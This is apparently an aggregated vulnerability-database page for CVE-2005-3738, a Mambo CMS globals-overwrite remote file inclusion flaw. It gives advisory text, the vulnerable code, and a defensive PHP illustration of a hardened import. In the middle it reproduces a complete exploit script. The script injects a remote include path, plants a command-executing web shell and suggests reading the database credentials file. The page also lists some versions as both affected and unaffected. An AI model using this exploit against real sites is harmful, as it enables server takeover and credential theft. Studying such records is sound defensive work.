CVE-2005-3738
CVSS 2.6
Published: 2005-11-22 06:03:00
Revised: 2011-03-07 21:27:03
NMCOES

[Original] globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.


[CNNVD] Mambo globals.php Remote File Inclusion Vulnerability (CNNVD-200511-354)

Mambo is a powerful, free, open-source content management system.
When register_globals is disabled, globals.php in Mambo contains a remote file inclusion vulnerability; an attacker who successfully exploits it can execute arbitrary remote PHP code with the privileges of the web server process.
In globals.php, every key of every request array is copied into $GLOBALS unchanged, so a request parameter can overwrite any global, including configuration variables such as mosConfig_absolute_path:

    if (!ini_get('register_globals')) {
        // register_globals emulation: each request key becomes a global variable
        while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
        while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
        while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value;
        foreach($_FILES as $key => $value){
            $GLOBALS[$key]=$_FILES[$key]['tmp_name'];
            foreach($value as $ext => $value2){
                $key2 = $key . '_' . $ext;
                $GLOBALS[$key2] = $value2;
            }
        }
    }

The protection in mambo.php is ineffective: it only rejects a request that contains the literal key 'globals' or '_post' in $_REQUEST, and does nothing about the other names the loop above imports:

    if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Global variable hack attempted.' );
    }
    if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {
        die( 'Fatal error. Post variable hack attempted.' );
    }
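How the overwrite happens and what a safe emulation layer looks like, as an added PHP illustration that is not part of the CNNVD record or of Mambo's code. safeImportRequestGlobals, the constructed sample request and the attacker.invalid host are assumptions.

```php
<?php
// Added illustration, not Mambo's own code. The globals.php loop above copies
// every key of $_GET, $_POST, $_COOKIE, ... into $GLOBALS unchanged, so a single
// request parameter can replace mosConfig_absolute_path, which content.html.php
// later passes to include(). The mambo.php check only rejects the literal keys
// 'globals' and '_post' in $_REQUEST and says nothing about any other name.
// safeImportRequestGlobals() is an assumed hardened replacement for that loop
// (not the vendor's patch): it accepts only plain identifiers, refuses the
// GLOBALS name, every mosConfig_* name and every superglobal-style name
// (leading underscore), and never overwrites a variable that already exists.
// It returns the rejected keys so the caller can log them.
function safeImportRequestGlobals(array $sources, array &$target)
{
    $rejected = array();
    foreach ($sources as $sourceName => $vars) {
        foreach ($vars as $key => $value) {
            $key = (string) $key;
            if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $key)) {
                $rejected[] = "$sourceName:$key";   // rejects _GET, _REQUEST, ...
            } elseif (strcasecmp($key, 'GLOBALS') === 0) {
                $rejected[] = "$sourceName:$key";   // never alias the GLOBALS array
            } elseif (strncasecmp($key, 'mosConfig_', 10) === 0) {
                $rejected[] = "$sourceName:$key";   // configuration names are read-only
            } elseif (array_key_exists($key, $target)) {
                $rejected[] = "$sourceName:$key";   // never overwrite an existing variable
            } else {
                $target[$key] = $value;
            }
        }
    }
    return $rejected;
}

// Constructed sample request using the parameter names from the advisory's
// vector, with a placeholder host in place of a real remote location.
$sampleGet = array(
    'option'                  => 'com_content',
    'Itemid'                  => '1',
    'GLOBALS'                 => '',
    '_REQUEST'                => array('option' => 'com_content'),
    'mosConfig_absolute_path' => 'http://attacker.invalid/',
);
$vars = array('mosConfig_absolute_path' => '/var/www/mambo');   // as set by configuration.php
$rejected = safeImportRequestGlobals(array('GET' => $sampleGet), $vars);

// Harmless keys are imported, the dangerous ones are refused and logged, and
// the configured path survives, so the include() target cannot be redirected.
assert($vars['option'] === 'com_content');
assert($vars['mosConfig_absolute_path'] === '/var/www/mambo');
assert($rejected === array('GET:GLOBALS', 'GET:_REQUEST', 'GET:mosConfig_absolute_path'));
```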

- CVSS (base score)

CVSS score: 2.6 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:mambo:mambo_site_server:4.0.14
cpe:/a:mambo:mambo_site_server:4.0.10
cpe:/a:mambo:mambo_site_server:4.0.12_beta
cpe:/a:mambo:mambo_site_server:4.0.12
cpe:/a:mambo:mambo_site_server:4.0.11
cpe:/a:mambo:mambo_site_server:4.0.12_rc3
cpe:/a:mambo:mambo_site_server:4.0.12_rc2
cpe:/a:mambo:mambo_site_server:4.0
cpe:/a:mambo:mambo_site_server:4.0.12_rc1
cpe:/a:mambo:mambo_site_server:4.0.12_beta_2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3738
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3738
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-354
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2005/2473
(UNKNOWN)  VUPEN  ADV-2005-2473
http://www.securityfocus.com/bid/15461
(UNKNOWN)  BID  15461
http://www.securityfocus.com/archive/1/417215
(UNKNOWN)  BUGTRAQ  20051118 Mambo 0day Exploit out in the wild - mambo/skype hacked
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html
(VENDOR_ADVISORY)  FULLDISC  20051116 mambo remote code sexecution
http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060308 RE: [Full-disclosure] PHP-based CMS mass-exploitation
http://www.securityfocus.com/archive/1/archive/1/426942/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 PHP-based CMS mass-exploitation
http://securitytracker.com/id?1015258
(UNKNOWN)  SECTRACK  1015258
http://secunia.com/advisories/17622
(UNKNOWN)  SECUNIA  17622
http://forum.mamboserver.com/showthread.php?t=66154
(UNKNOWN)  CONFIRM  http://forum.mamboserver.com/showthread.php?t=66154

- Vulnerability information

Mambo globals.php Remote File Inclusion Vulnerability
Low Input validation
2005-11-22 00:00:00 2005-11-23 00:00:00
Remote

- Advisories and patches

The vendor has not yet provided a patch or upgrade; users of this software are advised to monitor the vendor's homepage for the latest version:
http://mamboforge.net/

- Vulnerability information (1337)

Mambo <= 4.5.2 Globals Overwrite / Remote Command Execution Exploit (EDBID:1337)
php webapps
2005-11-22 Verified
0 rgod
N/A
<?php
#                                                                              #
#   ---mambo452_xpl.php                                 15.19 17/11/2005       #
#                                                                              #
#        Mambo <= 4.5.2 Globals overwrite / remote commands execution          #
#                              coded by rgod                                   #
#                    site: http://rgod.altervista.org                          #
#                                                                              #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu: "Rapidity is the essence of war:  take advantage of the enemy's    #
#  unreadiness, make your way by unexpected routes, and attack unguarded       #
#  spots."                                                                     #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ********* Mambo <= 4.5.2 remote commands xctn *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********** Mambo <= 4.5.2 remote commands xctn **********</p><p class="Stile6">a
script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form
name="form1" method="post"   action="'.$SERVER[PHP_SELF].'">           <p><input
type="text"  name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/mambo/  or just / ) </span></p><p><input type="text" name="command">      <span
class="Stile5"> * specify a command , "cat configuration.php" to see    database
username & password </span></p> <p><input type="text" name="location">     <span
class="Stile5"> * remote location ( ex: http://www.somesite.com) </span>    </p>
<p> <input type="text" name="port"><span class="Stile5">specify  a  port   other
than  80 ( default  value ) </span></p> <p>  <input  type="text"   name="proxy">
<span class="Stile5">  send  exploit through an  HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';


function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
		              //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                   }
	      else
 		  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
		   {
		     $result = socket_connect($socket, $host, $port);
		   }
		   else
		   {

		   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
		   $result = socket_connect($socket, $parts[0],$parts[1]);
		   }
		   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
	                       else
		                    {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

				    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
			die; }
      }
             else
           {
	   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
	   $parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $ock=fsockopen($parts[0],$parts[1]);
	    if (!$ock) { echo 'No response from proxy...';
			die;
		       }
	   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];$command=$_POST[command];
$proxy=$_POST[proxy];$location=$_POST[location];$port=$_POST[port];


if (($host<>'') and ($path<>'') and ($command<>'') and ($location<>''))
{

$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

$packet="GET ".$p."index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=".urlencode($location)." HTTP/1.1\r\n";
$packet.="User-Agent: NeuralBot/0.2\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

$packet="GET ".$p."suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: S.T.A.L.K.E.R.\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("Hi Master",$html)) {echo "Exploit succeeded...";}
                         else {echo "Exploit failed...";}

}
else
{
  echo "Note: on remote location you need this code in <br>
        http:/[location]/includes/HTML_toolbar.php/index.html :<br>";
  echo  nl2br(htmlentities("
        <?php
        \$fp=fopen(\"suntzu.php\",\"w\");
        fputs(\$fp,\"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>\");
        fclose(\$fp);
        ?>
        "));
  echo "<br>Fill * requested fields, optionally specify a proxy...";
}
?>

# milw0rm.com [2005-11-22]
		

- Vulnerability information

20915
Mambo register_globals Emulation Layer Overwrite File Inclusion
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-11-16 Unknown
2005-11-24 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Mambo Open Source Remote File Include Vulnerability
Input Validation Error 15461
Yes No
2005-11-16 12:00:00 2005-11-16 12:00:00
peter MC tachatte <slythers@gmail.com> is credited with the discovery of this vulnerability.

- Affected software versions

Mambo Mambo Site Server 4.0.14
Mambo Mambo Site Server 4.0.12 RC3
Mambo Mambo Site Server 4.0.12 RC2
Mambo Mambo Site Server 4.0.12 RC1
Mambo Mambo Site Server 4.0.12 BETA 2
Mambo Mambo Site Server 4.0.12 BETA
Mambo Mambo Site Server 4.0.12
Mambo Mambo Site Server 4.0.11
Mambo Mambo Site Server 4.0.10
Mambo Mambo Site Server 4.0
Joomla Joomla 1.0.3
Joomla Joomla 1.0.2
Joomla Joomla 1.0.1
Joomla Joomla 1.0
Mambo Mambo Open Source 4.5.2.3
Joomla Joomla 1.0.4

- Unaffected software versions

Mambo Mambo Open Source 4.5.2.3
Joomla Joomla 1.0.4

- Vulnerability discussion

Mambo is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Update: Reportedly, this issue is being actively exploited in the wild; multiple Web sites have been defaced, and the issue described in this BID is being cited as the attackers' method of entry.

Update 12/5/2005 - Reports indicate that a bot is propagating in the wild by exploiting this vulnerability.

- Exploit

An exploit is not required.

- Solution

The vendor has released a patch addressing this issue. Users are advised to contact the vendor for more information on obtaining the appropriate patch.

Joomla has released version 1.0.4 to address this, and other issues. Joomla is a fork of Mambo, and is susceptible to this issue.


Joomla Joomla 1.0
Joomla Joomla 1.0.1
Joomla Joomla 1.0.2
Joomla Joomla 1.0.3

- References

 

 
